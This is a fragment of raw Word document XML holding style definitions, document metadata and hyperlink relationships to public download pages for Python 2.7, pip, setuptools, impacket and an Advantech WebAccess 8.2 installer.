      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C56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pypi.org/project/setuptools/41.0.1/" TargetMode="Externa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yperlink" Target="https://files.pythonhosted.org/packages/45/ae/8a0ad77defb7cc903f09e551d88b443304a9bd6e6f124e75c0fbbf6de8f7/pip-18.1.tar.gz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pypi.org/project/pip/18.1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s://python.org/download/releases/2.7" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz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files.pythonhosted.org/packages/1d/64/a18a487b4391a05b9c7f938b94a16d80305bf0369c6b0b9509e86165e1d3/setuptools-41.0.1.zip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.ex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B194660-9735-4EDD-8B77-DBEA2FD560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11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凌空</dc:creator>
  <cp:lastModifiedBy>016 CN</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-29T09:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-29T17:49:00Z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8BE1C4494BBF49E285AA0D06EFF0E4C2</vt:lpwstr>
  </property>
</Properties>
</file>